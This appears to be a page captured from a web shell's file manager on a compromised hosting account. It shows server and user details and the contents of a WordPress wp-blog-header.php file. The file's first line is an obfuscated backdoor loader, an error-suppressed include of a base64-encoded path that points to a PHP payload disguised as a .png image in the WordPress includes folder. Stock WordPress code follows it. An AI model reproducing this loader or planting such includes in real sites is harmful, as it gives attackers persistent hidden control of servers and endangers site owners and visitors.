HEX
Server: Apache
System: Linux 66-116-198-230.webhostbox.net 5.14.0-570.44.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Sep 17 10:32:11 EDT 2025 x86_64
User: smitsolutionshyd (1006)
PHP: 8.2.29
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/smitsolutionshyd/public_html/vickyinteriors.in/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvc21pdHNvbHV0aW9uc2h5ZC9wdWJsaWNfaHRtbC92aWNreWludGVyaW9ycy5pbi93cC1pbmNsdWRlcy9pbWFnZXMvbWVkaWEvZmZhY2NmZmNkZGFiY2ViLnBuZw==");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}